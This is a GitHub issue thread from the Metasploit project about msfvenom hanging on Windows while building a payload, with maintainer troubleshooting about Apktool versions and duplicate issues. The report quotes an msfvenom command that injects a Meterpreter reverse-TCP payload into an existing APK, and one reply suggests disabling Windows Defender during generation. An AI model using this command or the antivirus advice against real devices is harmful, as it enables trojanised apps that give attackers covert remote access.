-
Notifications
You must be signed in to change notification settings - Fork 14.1k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
msfvenom command is getting stuck just after printing two lines. #13289
Comments
Seems someone else has also been experiencing this issue: see #13286. I'm going to move discussion here and track the issue in one location as the details here seem to suggest this may be related to the -x option, as running it without this option caused |
@gwillcox-r7 Is there any update of above mention issue? Thanks in advance, |
Old releases can be found here: |
Hi! This issue has been left open with no activity for a while now. We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request. |
Quick update on this but I did have to install No longer hanging, is giving compilation errors though
|
Alright so looks like a lot of those issues were actually fixed with Same files working successfully once ApkTools 2.5.0 is installed
|
Closing this issue as this seems to now be resolved. In summary please perform the following actions to resolve this issue:
|
@gwillcox-r7 hi, I am using Apktool 2.5.0 and metasploit-framework v6.0.50 but still getting same issue. |
Did you disable your AV on Windows including Windows Defender before trying to run this command? Its possible Windows Defender is catching something in memory whilst the payload is being generated which is causing this odd error. Also I believe the |
Dupe of rapid7/metasploit-payloads#543. This issue only affects msfvenom on Windows. See rapid7/metasploit-payloads#543 (comment) for a solution. |
I have executed below command in window 10 and it got stuck.
msfvenom -x "C:\Users\Vikrant ojha\Downloads\TestingApp.apk" -p android/meterpreter/reverse_tcp LHOST=10.212.12.255 LPORT=18563 -o "C:\Users\Vikrant ojha\Downloads\Testing.apk"
Using APK template: C:\Users\Vikrant ojha\Downloads\TestingApp.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Afterwords nothing happining.
I have also tried with -f raw but same result. and when i tried without -x, it give apk file which is not working.
It will be great if you can help me. screenshot attached.
The text was updated successfully, but these errors were encountered: